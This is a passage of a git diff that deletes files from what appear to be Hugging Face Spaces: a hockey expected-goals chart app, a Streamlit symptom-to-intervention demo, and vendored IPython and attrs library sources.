- , xref='paper' - , yref='paper' - , xanchor='left' - , yanchor='bottom' - , xshift=-1 - , yshift=-5 - , font=dict(size=11, color="white") - , align="left" - ) - fig.add_annotation( - text = (home_team + "
      "+str(home_xg)+" xG") - , showarrow=False - , x = .80 - , y = 1.02 - , xref='paper' - , yref='paper' - , xanchor='left' - , yanchor='bottom' - , xshift=-1 - , yshift=-5 - , font=dict(size=15, color="white") - , align="center" - ) - fig.add_annotation( - text = (away_team+"
      "+str(away_xg)+" xG") - , showarrow=False - , x = .13 - , y = 1.02 - , xref='paper' - , yref='paper' - , xanchor='left' - , yanchor='bottom' - , xshift=-1 - , yshift=-5 - , font=dict(size=15, color="white") - , align="center" - ) - - return fig - @output - @render_widget - def xg_chart(): - game = game_shots - game = game[game['Game_Id']==int(game_id)] - away = game['Away_Team'].tolist()[0] - home = game['Home_Team'].tolist()[0] - f = game[game['Ev_Team']==home] - s = game[game['Ev_Team']==away] - date = game['Date'].tolist()[0] - f['cxG'] = f['xG'].cumsum() - s['cxG'] = s['xG'].cumsum() - fa = f['gameSeconds'].tolist() - if max(game['gameSeconds'].tolist()) > 3600: - max_seconds = max(game['gameSeconds'].tolist())+1 - else: - max_seconds=3600 - fa.append(max_seconds) - fa.insert(0,0) - fx = f['cxG'].tolist() - fx.insert(0,0) - fx.append(fx[-1]) - sa = s['gameSeconds'].tolist() - sa.append(max_seconds) - sa.insert(0,0) - sx = s['cxG'].tolist() - sx.insert(0,0) - sx.append(sx[-1]) - import numpy as np - from scipy.interpolate import interp1d - import plotly.graph_objects as go - - # Define colors at the top - TEAM1_COLOR = '#EBEBD3' - TEAM2_COLOR = '#F95738' - FILL_COLOR_TEAM1 = '#EBEBD3' # Corresponding fill color for Team 1 - FILL_COLOR_TEAM2 = '#F95738' # Corresponding fill color for Team 2 - - # Create a new time array with 1-second intervals - full_time = np.arange(0, max_seconds, 1) # 60 minutes with 1-second intervals - - # Interpolate both teams' data to this new time array - f_interp = interp1d(fa, fx, kind='linear', bounds_error=False, fill_value=(fx[0], fx[-1])) - s_interp = interp1d(sa, sx, kind='linear', bounds_error=False, fill_value=(sx[0], sx[-1])) - - fx_full = f_interp(full_time) - sx_full = s_interp(full_time) - - fig = go.Figure() - - # Find intersections - intersections = np.where(np.diff(np.sign(fx_full - sx_full)))[0] - - # Initialize starting index - start = 0 - - # Loop through intersections and plot segments - for idx in intersections: - if fx_full[idx] > sx_full[idx]: - fillcolor = FILL_COLOR_TEAM1 - else: - fillcolor = FILL_COLOR_TEAM2 - - fig.add_trace(go.Scatter(x=full_time[start:idx+2], y=fx_full[start:idx+2], mode='lines', line=dict(color=TEAM1_COLOR), showlegend=False)) - fig.add_trace(go.Scatter(x=full_time[start:idx+2], y=sx_full[start:idx+2], mode='lines', line=dict(color=TEAM2_COLOR), - fill='tonexty', fillcolor=fillcolor, showlegend=False)) - start = idx + 1 - - # Handle the last segment - if fx_full[start] > sx_full[start]: - fillcolor = FILL_COLOR_TEAM1 - else: - fillcolor = FILL_COLOR_TEAM2 - - fig.add_trace(go.Scatter(x=full_time[start:], y=fx_full[start:], mode='lines', line=dict(color=TEAM1_COLOR), showlegend=False)) - fig.add_trace(go.Scatter(x=full_time[start:], y=sx_full[start:], mode='lines', line=dict(color=TEAM2_COLOR), - fill='tonexty', fillcolor=fillcolor, showlegend=False)) - - # Update layout for axis labels, theme, and figure dimensions - fig.update_layout( - title="Cumulative xG
      "+away+ " @ " + home +" - " + date + "
      Strength: All situations", - xaxis_title="Time", - xaxis_showgrid=False, # Hide x-axis grid lines - yaxis_title="xG", - yaxis_showgrid=False, # Hide y-axis grid lines - template="plotly_dark", - width=1400, - height=700, - plot_bgcolor="#222222", # Set plot background color - paper_bgcolor="#222222", - xaxis_range=[0, 3600], - yaxis_range=[0, 5.5], - ) - - # Add legend entries - fig.add_trace(go.Scatter(x=[None], y=[None], mode='lines', line=dict(color=TEAM1_COLOR), name=home)) - fig.add_trace(go.Scatter(x=[None], y=[None], mode='lines', line=dict(color=TEAM2_COLOR), name=away)) - if max_seconds==3600: - fig.update_layout( - xaxis_range=[0, 3600], - xaxis=dict( - tickvals=[0,1200,2400,3600], # positions of tick marks - ticktext=["0","20","40","60"] # text to display at those positions - ) - ) - else: - fig.update_layout( - xaxis_range=[0, max_seconds], - xaxis=dict( - tickvals=[0,1200,2400,3600,4800], # positions of tick marks - ticktext=["0","20","40","60","80"] # text to display at those positions - ) - ) - fig.update_layout(hovermode=False) - return fig -game = App(ui.page_fluid( - ui.tags.base(href=base_url), - ui.tags.div( - {"style": "width:75%;margin: 0 auto"}, - ui.tags.style( - """ - h4 { - margin-top: 1em;font-size:35px; - } - h2{ - font-size:25px; - } - """ - ), - shinyswatch.theme.darkly(), - ui.tags.h4("Stats By Zach"), - ui.tags.i("A website for hockey analytics"), - ui.navset_tab( - ui.nav_control( - ui.a( - "Home", - href="home/" - ), - ), - ui.nav_menu( - "Skater Charts", - ui.nav_control( - ui.a( - "On-Ice xG Rates", - href="skater-xg-rates/" - ), - ui.a( - "On-Ice xGF%", - href="skater-xg-percentages/" - ), - ), - ), - ui.nav_menu( - "Goalie Charts", - ui.nav_control( - ui.a( - "GSAx Timeline", - href="gsax-timeline/" - ), - ui.a( - "GSAx Leaderboard", - href="gsax-leaderboard/" - ), - ui.a( - "GSAx Comparison", - href="gsax-comparison/" - ) - ), - ),ui.nav_menu( - "Team Charts", - ui.nav_control( - ui.a( - "Team xG Rates", - href="team-xg-rates/" - ), - ), - ),ui.nav_control( - ui.a( - "Games", - href="games/" - ), - ),ui.nav_control( - ui.a( - "About", - href="about/" - ), - )),ui.row( - ui.column(12,ui.tags.br(),ui.tags.h2(ui.output_text("game_info_teams")),ui.tags.h2(ui.output_text("game_info_date")),ui.tags.h5("Shot Map"),ui.tags.h5("Select strength"),ui.input_select("strength", "", ["All",'Even','5v5']),ui.tags.h5("Select period"),ui.input_select("period", "",["All",1,2,3] ), - )),ui.row(ui.column(1),ui.column(11,output_widget("my_widget3"),output_widget("xg_chart"),ui.tags.br()), - ),ui.row(ui.tags.h5("On-Ice xGF%'s"),ui.tags.h5("Strength", class_="app-heading"),ui.input_select("strength_for_bars", "",{'even':"Even",'_5v5':"5v5",'All':"All Situations"})),ui.row(ui.column(6,output_widget("my_widget2")),ui.column(6,output_widget("my_widget"))))),server) \ No newline at end of file diff --git a/spaces/Stearns/crl-demo/Logic_Demo.py b/spaces/Stearns/crl-demo/Logic_Demo.py deleted file mode 100644 index d7f710c9e6c30374f6d72b88f78402e7f7f3ade0..0000000000000000000000000000000000000000 --- a/spaces/Stearns/crl-demo/Logic_Demo.py +++ /dev/null @@ -1,155 +0,0 @@ -import pandas as pd -import json -import streamlit as st - -import shared_streamlit_funcs as my - -if "ld_num_ss_inputs" not in st.session_state: - st.session_state["ld_num_ss_inputs"] = 1 - -def increment_ss_inputs(): - st.session_state.ld_num_ss_inputs += 1 -def decrement_ss_inputs(): - st.session_state.ld_num_ss_inputs = max(1, st.session_state.ld_num_ss_inputs-1) - -def short_cg(cg): - return {"Teaching, Guidance, and Counseling":"Teaching...", - "Case Management":"Case Mngmnt", - "Surveillance":"Surveillance", - "Treatments and Procedures":"Treatments..."}[cg] - -def json_to_output_df(json_str, input_list): - indata =json.loads(json_str) - outdata = {"Output":[""]*len(input_list), "Explanation":[""]*len(input_list)} - # Format is: {:{output:[{associated-item:{...}}], explanation:{tested-features:{...}}}} - haserr = False - - try: - # Process output for each op type - for opname,opdata in indata.items(): - # Process output for each input - for response in opdata: - # Process the output and explanation - if "explanation" not in response or "output" not in response: - continue - ss_ind = input_list.index(response["explanation"]["tested-features"]["member-data"]["sign-symptom"][0]) - outdata["Explanation"][ss_ind] = json.dumps(response["explanation"]["tested-features"]["member-data"]) - outdata["Output"][ss_ind] = json.dumps(response["output"][0]["associated-item"]) - except Exception as e: - print("ERROR in LogicDemo json_to_output_df(): "+str(e)) - haserr = True - - if haserr: - retval = pd.DataFrame() - else: - retval = pd.DataFrame(data=outdata) - - return retval - - -# Initialize the session -if "agent" not in st.session_state: - my.init() - -## SET UP STREAMLIT PAGE -# emojis: https://www.webfx.com/tools/emoji-cheat-sheet/ -st.set_page_config(page_title="🧠CRL Demo", layout="wide") -st.subheader("Cognitive Reasoner Lite Demo") -st.title("Generalized Rule Logic") -st.markdown("**Demonstrates teaching the agent a single rule that lets it respond to many inputs.**") - - -## Define S/S and intervention concepts -ss_list = [ - "Decreased Bowel Sounds", - "Difficulty Providing Preventive and Therapeutic Health Care", - "Limited Recall of Long Past Events", - "Infection", - "Heartburn/Belching/Indigestion", - "Electrolyte Imbalance", - "Difficulty Expressing Grief Responses", - "Absent/Abnormal Response To Sound", - "Minimal Shared Activities" -] -intvn_list = [ - ("Teaching, Guidance, and Counseling","Anatomy/Physiology","bowel function"), - ("Case Management","Other Community Resources","long term care options"), - ("Teaching, Guidance, and Counseling","Continuity of Care","simplified routine"), - ("Teaching, Guidance, and Counseling","Wellness","prevention of infection/sepsis"), - ("Surveillance","Signs/Symptoms-Physical","epigastric / heartburn pain or discomfort"), - ("Surveillance","Signs/Symptoms-Physical","intake and output"), - ("Case Management","Support Group","age/cultural/condition-specific groups"), - ("Teaching, Guidance, and Counseling","Signs/Symptoms-Physical","increased hearing loss/other changes"), - ("Teaching, Guidance, and Counseling","Behavioral Health Care","therapy to strengthen family support systems"), -] - -# Reset the agent before defining and linking concepts -agent_config = my.make_agent() - -# Allow the user to choose how to map S/Ss to Interventions -st.header("Training:") -st.subheader("How do you want the agent to map symptoms to interventions?") - -map_xpnd = st.expander(label="Mappings",expanded=True) - -row = map_xpnd.container() -map_col1, map_col2 = row.columns(2) -map_col1.subheader("Symptom") -map_col2.subheader("Intervention") -intvn_labels = [short_cg(cg)+"; "+tg+"; "+cd for (cg, tg, cd) in intvn_list] -# cd_list = [list(t) for t in zip(*intvn_list)][-1] # Transpose the list of tuples and convert to a list and get just the last list -for ind,ss in enumerate(ss_list): - row = map_xpnd.container() - map_col1, map_col2 = row.columns(2) - map_col1.text(ss) - intvn_select = map_col2.selectbox(label="Maps to Intervention:",options=range(len(intvn_labels)),index=ind, key="mapbox-"+str(ind), format_func=lambda x: intvn_labels[x]) - # Tell the agent to associate this S/S with this intvn - ss_concept = st.session_state.agent.getConcept("{'member-data':{'sign-symptom':'"+ss+"'}}") - cg,tg,cd = intvn_list[intvn_select] - intvn_concept = st.session_state.agent.getConcept("{'intervention':{'category':'"+cg+"','target':'"+tg+"','care-descriptor':'"+cd+"'}}") - st.session_state.agent.linkConcepts(agent_config.decisionTypeId, "SS-INTVN", ss_concept, intvn_concept) - -st.subheader("What do you want the agent to report?") -select_report_attr = st.selectbox(label="Intervention element", options=["Category","Target","Care Descriptor", "All"], index=1) -report_attr = {"Category":"category", "Target":"target", "Care Descriptor":"care-descriptor", "All":""}[select_report_attr] - -# Define action behavior to report result (triggered as soon as the intervention concept is active in WM) -# Report just the active 'target-id' elements of the intervention associated with the matched condition -intvn_conc = st.session_state.agent.getConcept("{'intervention':null}") -st.session_state.agent.trainAction(agent_config, intvn_conc, my.ReportActiveConceptActionInList("associated-item", report_attr)) - -st.markdown("---") -st.header("Input:") -st.subheader("Choose a request to send to the agent.") - -if st.session_state.ld_num_ss_inputs > len(ss_list): - st.session_state.ld_num_ss_inputs = len(ss_list) -ss_input_select_list = [st.selectbox(label="Signs/Symptom:", options=ss_list, index=i, key="ss_in-"+str(i)) for i in range(st.session_state.ld_num_ss_inputs)] -in_col1, in_col2 = st.columns(8)[0:2] -in_col1.button(label="New Input", on_click=increment_ss_inputs, disabled=(st.session_state.ld_num_ss_inputs >= len(ss_list))) -in_col2.button(label="Remove Input", on_click=decrement_ss_inputs, disabled=(st.session_state.ld_num_ss_inputs <= 1)) # em: —, en: – - - -# Send a partial pattern to the agent's input -st.session_state.agent.clearInput() -for select in ss_input_select_list: - st.session_state.agent.addInput("{'member-data':{'sign-symptom':'"+select+"'}}") - - -st.markdown("---") -st.header("Agent Output:") -# Show the input to the user -io_col1, io_col2 = st.columns(2) -io_col1.text("Input sent to agent:") -io_col1.dataframe(data={'Signs/Symptoms':ss_input_select_list}) -io_col1.text_area(label="Raw JSON Input", value=st.session_state.agent.getInputAsJsonString(), height=200) - -# Run the agent with the given input to get a corresponding memory -st.session_state.agent.setMaxOpCycles(-1) -st.session_state.agent.queryDecision(agent_config.decisionTypeId, 5) - -output = st.session_state.agent.getOutputAsJsonString() -query_time_ms = st.session_state.agent.getLastQueryTime()/1000000.0 -io_col2.text("Agent Response: ("+str(query_time_ms)+" ms)") -io_col2.dataframe(data=json_to_output_df(output, ss_input_select_list),) -io_col2.text_area(label="Raw JSON Output:",value=output, height=500) diff --git a/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/IPython/core/magics/logging.py b/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/IPython/core/magics/logging.py deleted file mode 100644 index b6b8d8a5af6d4c083858766586228bcaa373804a..0000000000000000000000000000000000000000 --- a/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/IPython/core/magics/logging.py +++ /dev/null @@ -1,195 +0,0 @@ -"""Implementation of magic functions for IPython's own logging. -""" -#----------------------------------------------------------------------------- -# Copyright (c) 2012 The IPython Development Team. -# -# Distributed under the terms of the Modified BSD License. -# -# The full license is in the file COPYING.txt, distributed with this software. -#----------------------------------------------------------------------------- - -#----------------------------------------------------------------------------- -# Imports -#----------------------------------------------------------------------------- - -# Stdlib -import os -import sys - -# Our own packages -from IPython.core.magic import Magics, magics_class, line_magic -from warnings import warn -from traitlets import Bool - -#----------------------------------------------------------------------------- -# Magic implementation classes -#----------------------------------------------------------------------------- - -@magics_class -class LoggingMagics(Magics): - """Magics related to all logging machinery.""" - - quiet = Bool(False, help= - """ - Suppress output of log state when logging is enabled - """ - ).tag(config=True) - - @line_magic - def logstart(self, parameter_s=''): - """Start logging anywhere in a session. - - %logstart [-o|-r|-t|-q] [log_name [log_mode]] - - If no name is given, it defaults to a file named 'ipython_log.py' in your - current directory, in 'rotate' mode (see below). - - '%logstart name' saves to file 'name' in 'backup' mode. It saves your - history up to that point and then continues logging. - - %logstart takes a second optional parameter: logging mode. This can be one - of (note that the modes are given unquoted): - - append - Keep logging at the end of any existing file. - - backup - Rename any existing file to name~ and start name. - - global - Append to a single logfile in your home directory. - - over - Overwrite any existing log. - - rotate - Create rotating logs: name.1~, name.2~, etc. - - Options: - - -o - log also IPython's output. In this mode, all commands which - generate an Out[NN] prompt are recorded to the logfile, right after - their corresponding input line. The output lines are always - prepended with a '#[Out]# ' marker, so that the log remains valid - Python code. - - Since this marker is always the same, filtering only the output from - a log is very easy, using for example a simple awk call:: - - awk -F'#\\[Out\\]# ' '{if($2) {print $2}}' ipython_log.py - - -r - log 'raw' input. Normally, IPython's logs contain the processed - input, so that user lines are logged in their final form, converted - into valid Python. For example, %Exit is logged as - _ip.magic("Exit"). If the -r flag is given, all input is logged - exactly as typed, with no transformations applied. - - -t - put timestamps before each input line logged (these are put in - comments). - - -q - suppress output of logstate message when logging is invoked - """ - - opts,par = self.parse_options(parameter_s,'ortq') - log_output = 'o' in opts - log_raw_input = 'r' in opts - timestamp = 't' in opts - quiet = 'q' in opts - - logger = self.shell.logger - - # if no args are given, the defaults set in the logger constructor by - # ipython remain valid - if par: - try: - logfname,logmode = par.split() - except: - logfname = par - logmode = 'backup' - else: - logfname = logger.logfname - logmode = logger.logmode - # put logfname into rc struct as if it had been called on the command - # line, so it ends up saved in the log header Save it in case we need - # to restore it... - old_logfile = self.shell.logfile - if logfname: - logfname = os.path.expanduser(logfname) - self.shell.logfile = logfname - - loghead = u'# IPython log file\n\n' - try: - logger.logstart(logfname, loghead, logmode, log_output, timestamp, - log_raw_input) - except: - self.shell.logfile = old_logfile - warn("Couldn't start log: %s" % sys.exc_info()[1]) - else: - # log input history up to this point, optionally interleaving - # output if requested - - if timestamp: - # disable timestamping for the previous history, since we've - # lost those already (no time machine here). - logger.timestamp = False - - if log_raw_input: - input_hist = self.shell.history_manager.input_hist_raw - else: - input_hist = self.shell.history_manager.input_hist_parsed - - if log_output: - log_write = logger.log_write - output_hist = self.shell.history_manager.output_hist - for n in range(1,len(input_hist)-1): - log_write(input_hist[n].rstrip() + u'\n') - if n in output_hist: - log_write(repr(output_hist[n]),'output') - else: - logger.log_write(u'\n'.join(input_hist[1:])) - logger.log_write(u'\n') - if timestamp: - # re-enable timestamping - logger.timestamp = True - - if not (self.quiet or quiet): - print ('Activating auto-logging. ' - 'Current session state plus future input saved.') - logger.logstate() - - @line_magic - def logstop(self, parameter_s=''): - """Fully stop logging and close log file. - - In order to start logging again, a new %logstart call needs to be made, - possibly (though not necessarily) with a new filename, mode and other - options.""" - self.shell.logger.logstop() - - @line_magic - def logoff(self, parameter_s=''): - """Temporarily stop logging. - - You must have previously started logging.""" - self.shell.logger.switch_log(0) - - @line_magic - def logon(self, parameter_s=''): - """Restart logging. - - This function is for restarting logging which you've temporarily - stopped with %logoff. For starting logging for the first time, you - must use the %logstart function, which allows you to specify an - optional log filename.""" - - self.shell.logger.switch_log(1) - - @line_magic - def logstate(self, parameter_s=''): - """Print the status of the logging system.""" - - self.shell.logger.logstate() diff --git a/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/IPython/core/tests/bad_all.py b/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/IPython/core/tests/bad_all.py deleted file mode 100644 index a7716ab6f328de060c5e472dfd2e8d47ee21a99d..0000000000000000000000000000000000000000 --- a/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/IPython/core/tests/bad_all.py +++ /dev/null @@ -1,14 +0,0 @@ -"""Module with bad __all__ - -To test https://github.com/ipython/ipython/issues/9678 -""" - -def evil(): - pass - -def puppies(): - pass - -__all__ = [evil, # Bad - 'puppies', # Good - ] diff --git a/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/IPython/sphinxext/ipython_console_highlighting.py b/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/IPython/sphinxext/ipython_console_highlighting.py deleted file mode 100644 index b93a151fb3cb0c4eaa02420e35c5994a54abeb38..0000000000000000000000000000000000000000 --- a/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/IPython/sphinxext/ipython_console_highlighting.py +++ /dev/null @@ -1,28 +0,0 @@ -""" -reST directive for syntax-highlighting ipython interactive sessions. - -""" - -from sphinx import highlighting -from IPython.lib.lexers import IPyLexer - -def setup(app): - """Setup as a sphinx extension.""" - - # This is only a lexer, so adding it below to pygments appears sufficient. - # But if somebody knows what the right API usage should be to do that via - # sphinx, by all means fix it here. At least having this setup.py - # suppresses the sphinx warning we'd get without it. - metadata = {'parallel_read_safe': True, 'parallel_write_safe': True} - return metadata - -# Register the extension as a valid pygments lexer. -# Alternatively, we could register the lexer with pygments instead. This would -# require using setuptools entrypoints: http://pygments.org/docs/plugins - -ipy2 = IPyLexer(python3=False) -ipy3 = IPyLexer(python3=True) - -highlighting.lexers['ipython'] = ipy2 -highlighting.lexers['ipython2'] = ipy2 -highlighting.lexers['ipython3'] = ipy3 diff --git a/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/IPython/terminal/tests/test_pt_inputhooks.py b/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/IPython/terminal/tests/test_pt_inputhooks.py deleted file mode 100644 index 3f788c738cffdca794b72dcf2f5c488c17a1d0af..0000000000000000000000000000000000000000 --- a/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/IPython/terminal/tests/test_pt_inputhooks.py +++ /dev/null @@ -1,50 +0,0 @@ -import os -import importlib - -import pytest - -from IPython.terminal.pt_inputhooks import set_qt_api, get_inputhook_name_and_func - - -guis_avail = [] - - -def _get_qt_vers(): - """If any version of Qt is available, this will populate `guis_avail` with 'qt' and 'qtx'. Due - to the import mechanism, we can't import multiple versions of Qt in one session.""" - for gui in ["qt", "qt6", "qt5"]: - print(f"Trying {gui}") - try: - set_qt_api(gui) - importlib.import_module("IPython.terminal.pt_inputhooks.qt") - guis_avail.append(gui) - if "QT_API" in os.environ.keys(): - del os.environ["QT_API"] - except ImportError: - pass # that version of Qt isn't available. - except RuntimeError: - pass # the version of IPython doesn't know what to do with this Qt version. - - -_get_qt_vers() - - -@pytest.mark.skipif( - len(guis_avail) == 0, reason="No viable version of PyQt or PySide installed." -) -def test_inputhook_qt(): - # Choose the "best" Qt version. - gui_ret, _ = get_inputhook_name_and_func("qt") - - assert gui_ret != "qt" # you get back the specific version that was loaded. - assert gui_ret in guis_avail - - if len(guis_avail) > 2: - # ...and now we're stuck with this version of Qt for good; can't switch. - for not_gui in ["qt6", "qt5"]: - if not_gui != gui_ret: - break - # Try to import the other gui; it won't work. - gui_ret2, _ = get_inputhook_name_and_func(not_gui) - assert gui_ret2 == gui_ret - assert gui_ret2 != not_gui diff --git a/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/attr/_make.py b/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/attr/_make.py deleted file mode 100644 index d72f738eeca66ea96ec836f57720a7f5d6ec5169..0000000000000000000000000000000000000000 --- a/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/attr/_make.py +++ /dev/null @@ -1,2987 +0,0 @@ -# SPDX-License-Identifier: MIT - -import copy -import enum -import linecache -import sys -import types -import typing - -from operator import itemgetter - -# We need to import _compat itself in addition to the _compat members to avoid -# having the thread-local in the globals here. -from . import _compat, _config, setters -from ._compat import ( - PY310, - _AnnotationExtractor, - get_generic_base, - set_closure_cell, -) -from .exceptions import ( - DefaultAlreadySetError, - FrozenInstanceError, - NotAnAttrsClassError, - UnannotatedAttributeError, -) - - -# This is used at least twice, so cache it here. -_obj_setattr = object.__setattr__ -_init_converter_pat = "__attr_converter_%s" -_init_factory_pat = "__attr_factory_%s" -_classvar_prefixes = ( - "typing.ClassVar", - "t.ClassVar", - "ClassVar", - "typing_extensions.ClassVar", -) -# we don't use a double-underscore prefix because that triggers -# name mangling when trying to create a slot for the field -# (when slots=True) -_hash_cache_field = "_attrs_cached_hash" - -_empty_metadata_singleton = types.MappingProxyType({}) - -# Unique object for unequivocal getattr() defaults. -_sentinel = object() - -_ng_default_on_setattr = setters.pipe(setters.convert, setters.validate) - - -class _Nothing(enum.Enum): - """ - Sentinel to indicate the lack of a value when ``None`` is ambiguous. - - If extending attrs, you can use ``typing.Literal[NOTHING]`` to show - that a value may be ``NOTHING``. - - .. versionchanged:: 21.1.0 ``bool(NOTHING)`` is now False. - .. versionchanged:: 22.2.0 ``NOTHING`` is now an ``enum.Enum`` variant. - """ - - NOTHING = enum.auto() - - def __repr__(self): - return "NOTHING" - - def __bool__(self): - return False - - -NOTHING = _Nothing.NOTHING -""" -Sentinel to indicate the lack of a value when ``None`` is ambiguous. -""" - - -class _CacheHashWrapper(int): - """ - An integer subclass that pickles / copies as None - - This is used for non-slots classes with ``cache_hash=True``, to avoid - serializing a potentially (even likely) invalid hash value. Since ``None`` - is the default value for uncalculated hashes, whenever this is copied, - the copy's value for the hash should automatically reset. - - See GH #613 for more details. - """ - - def __reduce__(self, _none_constructor=type(None), _args=()): - return _none_constructor, _args - - -def attrib( - default=NOTHING, - validator=None, - repr=True, - cmp=None, - hash=None, - init=True, - metadata=None, - type=None, - converter=None, - factory=None, - kw_only=False, - eq=None, - order=None, - on_setattr=None, - alias=None, -): - """ - Create a new attribute on a class. - - .. warning:: - - Does *not* do anything unless the class is also decorated with - `attr.s` / `attrs.define` / et cetera! - - Please consider using `attrs.field` in new code (``attr.ib`` will *never* - go away, though). - - :param default: A value that is used if an *attrs*-generated ``__init__`` - is used and no value is passed while instantiating or the attribute is - excluded using ``init=False``. - - If the value is an instance of `attrs.Factory`, its callable will be - used to construct a new value (useful for mutable data types like lists - or dicts). - - If a default is not set (or set manually to `attrs.NOTHING`), a value - *must* be supplied when instantiating; otherwise a `TypeError` - will be raised. - - The default can also be set using decorator notation as shown below. - - :type default: Any value - - :param callable factory: Syntactic sugar for - ``default=attr.Factory(factory)``. - - :param validator: `callable` that is called by *attrs*-generated - ``__init__`` methods after the instance has been initialized. They - receive the initialized instance, the :func:`~attrs.Attribute`, and the - passed value. - - The return value is *not* inspected so the validator has to throw an - exception itself. - - If a `list` is passed, its items are treated as validators and must - all pass. - - Validators can be globally disabled and re-enabled using - `attrs.validators.get_disabled` / `attrs.validators.set_disabled`. - - The validator can also be set using decorator notation as shown below. - - :type validator: `callable` or a `list` of `callable`\\ s. - - :param repr: Include this attribute in the generated ``__repr__`` - method. If ``True``, include the attribute; if ``False``, omit it. By - default, the built-in ``repr()`` function is used. To override how the - attribute value is formatted, pass a ``callable`` that takes a single - value and returns a string. Note that the resulting string is used - as-is, i.e. it will be used directly *instead* of calling ``repr()`` - (the default). - :type repr: a `bool` or a `callable` to use a custom function. - - :param eq: If ``True`` (default), include this attribute in the - generated ``__eq__`` and ``__ne__`` methods that check two instances - for equality. To override how the attribute value is compared, - pass a ``callable`` that takes a single value and returns the value - to be compared. - :type eq: a `bool` or a `callable`. - - :param order: If ``True`` (default), include this attributes in the - generated ``__lt__``, ``__le__``, ``__gt__`` and ``__ge__`` methods. - To override how the attribute value is ordered, - pass a ``callable`` that takes a single value and returns the value - to be ordered. - :type order: a `bool` or a `callable`. - - :param cmp: Setting *cmp* is equivalent to setting *eq* and *order* to the - same value. Must not be mixed with *eq* or *order*. - :type cmp: a `bool` or a `callable`. - - :param Optional[bool] hash: Include this attribute in the generated - ``__hash__`` method. If ``None`` (default), mirror *eq*'s value. This - is the correct behavior according the Python spec. Setting this value - to anything else than ``None`` is *discouraged*. - :param bool init: Include this attribute in the generated ``__init__`` - method. It is possible to set this to ``False`` and set a default - value. In that case this attributed is unconditionally initialized - with the specified default value or factory. - :param callable converter: `callable` that is called by - *attrs*-generated ``__init__`` methods to convert attribute's value - to the desired format. It is given the passed-in value, and the - returned value will be used as the new value of the attribute. The - value is converted before being passed to the validator, if any. - :param metadata: An arbitrary mapping, to be used by third-party - components. See `extending-metadata`. - - :param type: The type of the attribute. Nowadays, the preferred method to - specify the type is using a variable annotation (see :pep:`526`). - This argument is provided for backward compatibility. - Regardless of the approach used, the type will be stored on - ``Attribute.type``. - - Please note that *attrs* doesn't do anything with this metadata by - itself. You can use it as part of your own code or for - `static type checking `. - :param kw_only: Make this attribute keyword-only in the generated - ``__init__`` (if ``init`` is ``False``, this parameter is ignored). - :param on_setattr: Allows to overwrite the *on_setattr* setting from - `attr.s`. If left `None`, the *on_setattr* value from `attr.s` is used. - Set to `attrs.setters.NO_OP` to run **no** `setattr` hooks for this - attribute -- regardless of the setting in `attr.s`. - :type on_setattr: `callable`, or a list of callables, or `None`, or - `attrs.setters.NO_OP` - :param Optional[str] alias: Override this attribute's parameter name in the - generated ``__init__`` method. If left `None`, default to ``name`` - stripped of leading underscores. See `private-attributes`. - - .. versionadded:: 15.2.0 *convert* - .. versionadded:: 16.3.0 *metadata* - .. versionchanged:: 17.1.0 *validator* can be a ``list`` now. - .. versionchanged:: 17.1.0 - *hash* is ``None`` and therefore mirrors *eq* by default. - .. versionadded:: 17.3.0 *type* - .. deprecated:: 17.4.0 *convert* - .. versionadded:: 17.4.0 *converter* as a replacement for the deprecated - *convert* to achieve consistency with other noun-based arguments. - .. versionadded:: 18.1.0 - ``factory=f`` is syntactic sugar for ``default=attr.Factory(f)``. - .. versionadded:: 18.2.0 *kw_only* - .. versionchanged:: 19.2.0 *convert* keyword argument removed. - .. versionchanged:: 19.2.0 *repr* also accepts a custom callable. - .. deprecated:: 19.2.0 *cmp* Removal on or after 2021-06-01. - .. versionadded:: 19.2.0 *eq* and *order* - .. versionadded:: 20.1.0 *on_setattr* - .. versionchanged:: 20.3.0 *kw_only* backported to Python 2 - .. versionchanged:: 21.1.0 - *eq*, *order*, and *cmp* also accept a custom callable - .. versionchanged:: 21.1.0 *cmp* undeprecated - .. versionadded:: 22.2.0 *alias* - """ - eq, eq_key, order, order_key = _determine_attrib_eq_order( - cmp, eq, order, True - ) - - if hash is not None and hash is not True and hash is not False: - raise TypeError( - "Invalid value for hash. Must be True, False, or None." - ) - - if factory is not None: - if default is not NOTHING: - raise ValueError( - "The `default` and `factory` arguments are mutually " - "exclusive." - ) - if not callable(factory): - raise ValueError("The `factory` argument must be a callable.") - default = Factory(factory) - - if metadata is None: - metadata = {} - - # Apply syntactic sugar by auto-wrapping. - if isinstance(on_setattr, (list, tuple)): - on_setattr = setters.pipe(*on_setattr) - - if validator and isinstance(validator, (list, tuple)): - validator = and_(*validator) - - if converter and isinstance(converter, (list, tuple)): - converter = pipe(*converter) - - return _CountingAttr( - default=default, - validator=validator, - repr=repr, - cmp=None, - hash=hash, - init=init, - converter=converter, - metadata=metadata, - type=type, - kw_only=kw_only, - eq=eq, - eq_key=eq_key, - order=order, - order_key=order_key, - on_setattr=on_setattr, - alias=alias, - ) - - -def _compile_and_eval(script, globs, locs=None, filename=""): - """ - "Exec" the script with the given global (globs) and local (locs) variables. - """ - bytecode = compile(script, filename, "exec") - eval(bytecode, globs, locs) - - -def _make_method(name, script, filename, globs): - """ - Create the method with the script given and return the method object. - """ - locs = {} - - # In order of debuggers like PDB being able to step through the code, - # we add a fake linecache entry. - count = 1 - base_filename = filename - while True: - linecache_tuple = ( - len(script), - None, - script.splitlines(True), - filename, - ) - old_val = linecache.cache.setdefault(filename, linecache_tuple) - if old_val == linecache_tuple: - break - else: - filename = f"{base_filename[:-1]}-{count}>" - count += 1 - - _compile_and_eval(script, globs, locs, filename) - - return locs[name] - - -def _make_attr_tuple_class(cls_name, attr_names): - """ - Create a tuple subclass to hold `Attribute`s for an `attrs` class. - - The subclass is a bare tuple with properties for names. - - class 